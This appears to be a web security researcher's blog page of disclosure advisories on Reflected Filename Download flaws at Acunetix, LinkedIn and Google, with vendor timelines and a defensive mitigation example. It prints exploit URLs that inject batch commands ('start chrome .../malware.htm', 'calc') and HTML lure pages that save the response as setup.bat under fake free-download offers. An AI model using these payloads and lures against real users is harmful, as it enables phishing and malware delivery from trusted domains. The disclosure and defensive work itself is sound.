David Sopas – Web Security Researcher

rfd

23/09/15 Advisories

Acunetix got RFDed!

After publishing a report on a piece of security software (OWASP ZAP), I found another vulnerability at a security company: Acunetix.
It brings to mind the proverb:

The shoemaker's son always goes barefoot.

I found a way to trick users into downloading a batch [executable] file that comes from ovs.acunetix.com using a Reflected Filename Download vulnerability.
It was funny how I found this one. I noticed that Acunetix let users test for vulnerabilities online, and I was curious about that web application. I registered for a demo account and noticed lots of XHR requests in my Google Inspector. So I decided to give RFD a try…

This security issue affected almost all XHR requests on ovs.acunetix.com (Acunetix Online Vulnerability Scanner). Every request allowed a user to inject a callback containing special characters, which would let me launch a possible attack.

Take this example:

https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||

Which reflects on the screen:

start chrome davidsopas.com/poc/malware.htm||({"message": "get:sgn:invalid size", "data": null, "error": "bad-input"});

It didn’t give any HTTP error:

Request URL:https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Request Method:GET
Status Code:200 OK
Remote Address:54.209.55.15:443

So I was able to inject a callback, and even though the JSON body reported an error, the response did not carry an HTTP error status.

Because I couldn't control the filename and force a download, I needed to use the HTML5 download attribute.

<div align="center"> 
 <a href="https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;">
 <img src="https://www.davidsopas.com/poc/Acunetix_1.jpg" border="0" />
 </a> 
 <h1>Download Acunetix Web Security Scanner for Free!</h1> 
 <p><i>(Use "Save link as" to download the file)</i></p> 
</div>

As I said before, it happened on almost every XHR request:

https://ovs.acunetix.com/rpc/scans/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/scans/list?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/licenses/get?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||

Possible attack scenario:
Because this endpoint can be accessed without authentication, a malicious user could use it to attack any user.

  1. The malicious user creates a specially crafted page, similar to my proof-of-concept, promising a download of Acunetix web security software.
  2. The victim clicks to download the file [even if the victim checks the page's source code, they would see the trusted source, acunetix.com]
  3. The victim runs the file and their machine is hijacked

The Acunetix security team fixed this vulnerability very fast, proving that they're on top of things. I wish I could see other companies follow Acunetix's patching timeline.

Timeline:

17-09-2015 Reported to Acunetix
17-09-2015 Acunetix acknowledged the vulnerability
18-09-2015 Acunetix informed me that they had fixed this security issue
22-09-2015 Full disclosure

18/09/15 Advisories

Linkedin Reflected Filename Download

While researching another website, I discovered an XHR request to Linkedin in my Google Inspector that seemed interesting:

https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt

Basically it was the request websites make to count how many shares their site has on the Linkedin network.
As a curious security researcher, I tried modifying the url parameter to something more interesting:

https://www.linkedin.com/countserv/count/share?url="||calc||

Which returned:

IN.Tags.Share.handleCount({"count":0,"fCnt":"0","fCntPlusOne":"1","url":"\"||calc||"});

The url parameter wasn't validated and was reflected in the JSON file.
If I downloaded the file and renamed it to .bat, it launched the Windows calculator.
But this was not enough: I needed to change the path so that it downloads as a batch file, and to use a different Windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||

Guess what? IE8 automatically downloaded this batch file from a trusted domain, linkedin.com.
I wanted it to work with other browsers too, so I needed the HTML5 download attribute.

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a> 
<h1>Linkedin Premium account!</h1> 
<p><i>(Use "Save link as" to download the file)</i></p> 
</div>

[Screenshot: linkedin_rfd_chrome]

So a possible attack scenario would be:

  1. A malicious user sends a link to the victim, as they would with a CSRF or XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
  2. The victim clicks the link and, trusting where it came from (Linkedin), downloads the file
  3. The victim runs the file and their computer is hijacked

A malicious user could lend even more credibility to the HTML5 download page by using well-known open redirect vulnerabilities on trusted sites, such as the open redirects on Google or even on Linkedin.

To the victim, the entire process looks as if a file is being offered for download from the original Linkedin site, and it would not raise any suspicion. A malicious user could gain complete control over a victim's computer and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining victims' trust. This could be the right online weapon.

Timeline:
11-05-2015 Sent the report to Linkedin
11-05-2015 Linkedin didn't understand the true nature of the attack
11-05-2015 I replied with more information, citing other public RFD attacks and Oren Hafif's paper about RFD
13-05-2015 Linkedin told me that they're working on a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they would give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fixed the issue
18-09-2015 Full disclosure

10/09/15 Advisories

Google Reflected Filename Download

I found a critical issue on Google that can be used by malicious users to hijack victims' computers, using a Google domain as the platform and source of trust.

I came across this security issue when I noticed, using Google Inspector, a JSON request to the following URL:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=xss&num=5&_=1439709781835

After checking that the callback parameter was reflected in the response, I tried the following GET request:

https://www.googleapis.com/customsearch/v1?callback=calc&key=&cx=&q=xss&num=5

Which returns the following JSON information:

// API callback
calc({
  "error": {
    "errors": [
      {
        "domain": "usageLimits",
        "reason": "keyInvalid",
        "message": "Bad Request"
      }
    ],
    "code": 400,
    "message": "Bad Request"
  }
});

It returns HTTP status code 200 even though the JSON body says it's an error (?). In this case the callback parameter only allows a command without spaces, so in the following proof-of-concept I could only execute calc from Windows.

But I wanted a better and more exploitable proof-of-concept, so I tried the query parameter, "q":

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=%22%7C%7Cstart+chrome+davidsopas.com%2Fpoc%2Fmalware.htm%7C%7C&num=5

Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The payload is reflected. Because I couldn't control the filename and force a download, I needed to use the HTML5 download attribute, which is supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept (downloads a batch file that opens a new Chrome window with a URL; in my PoC it is just text):

[Screenshots: google_rfd3, google_rfd2]

This works on most Microsoft Windows versions. It can also be used on Linux and OS X, but it needs more user interaction. For a multi-platform attack, a malicious user could create a .htm file instead of a .bat file, with the HTML file itself being malicious. This might be an alternative attack method that works across all operating systems.

So in my proof-of-concept I was able to open a new Chrome window with a page that simulates malware [it's just text].

A malicious user could:

  1. Launch a malicious campaign with a specially crafted page offering Google products, similar to my proof-of-concept
  2. The victim downloads the file, thinking it comes from a trusted domain [googleapis.com]
  3. The malicious user gains control over the victim's machine

How to fix this issue?
Google has already fixed most of these issues by sending the HTTP header Content-Disposition: attachment; filename="f.txt", which forces the download to be named f.txt every time. But this time they decided not to fix it, because they say it needs too much user interaction.
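The mitigation above, and the callback injection (Acunetix post) and `;setup.bat` path trick (Linkedin post) it defends against, as an added example that is not code from any of the vendors: a minimal JSONP response builder in Python. The callback grammar, the `hardened` flag and the helper names are assumptions of this example.

```python
import json
import re

# Strict JSONP callback grammar (an assumption of this example): a dotted
# JavaScript identifier and nothing else, so spaces, quotes and "||" are rejected.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def jsonp_response(callback, payload, hardened=True):
    """Return (status, headers, body) for a JSONP endpoint.

    hardened=False reproduces the weak behaviour described in the posts: the
    callback is echoed verbatim and the saved filename is left to the client.
    hardened=True validates the callback and pins the download filename.
    """
    headers = {"Content-Type": "application/javascript; charset=utf-8"}
    body = f"{callback}({json.dumps(payload)});"
    if not hardened:
        return 200, headers, body
    if not CALLBACK_RE.match(callback):
        # Refuse to echo the value; a 400 also makes the attempt visible in logs.
        return 400, headers, json.dumps({"error": "bad-callback"})
    # Fixed filename with a harmless extension, whatever the URL path says, plus
    # nosniff so the browser does not reinterpret the script as something else.
    headers["Content-Disposition"] = 'attachment; filename="f.txt"'
    headers["X-Content-Type-Options"] = "nosniff"
    return 200, headers, body


def saved_filename(url_path, headers):
    """Filename a browser would save the response under: the Content-Disposition
    filename if present, otherwise the last URL path segment (which is what the
    ';setup.bat' path trick in the Linkedin post relies on)."""
    match = re.search(r'filename="([^"]+)"', headers.get("Content-Disposition", ""))
    return match.group(1) if match else url_path.rsplit("/", 1)[-1]


if __name__ == "__main__":
    # Constructed inputs modelled on the advisories above.
    payload = {"url": '"||calc||', "count": 0}
    for cb in ("calc", "start chrome example.invalid/poc||"):
        for hardened in (False, True):
            status, hdrs, body = jsonp_response(cb, payload, hardened)
            name = saved_filename("/countserv/count/share;setup.bat", hdrs)
            print(f"hardened={hardened} callback={cb!r}: {status} -> {name}")
```

Note that `calc` passes the callback check and `json.dumps` only escapes the quote in `"||calc||`, which cmd.exe does not care about; the pinned `.txt` filename is what actually removes the batch-file outcome.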

03/08/15 Advisories

Desk.com Reflected Filename Download

Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?


03/08/15 Swag

Mixpanel gave me a cool Tshirt

When I help companies fix security issues, I don't ask for anything in return.

I came across a security issue on Mixpanel while auditing a private client on Cobalt.io, and I sent Mixpanel a short security advisory describing a Reflected Filename Download vulnerability, with a couple of screenshots.
The Mixpanel security team fixed the vulnerability very fast, showing that they care about security.

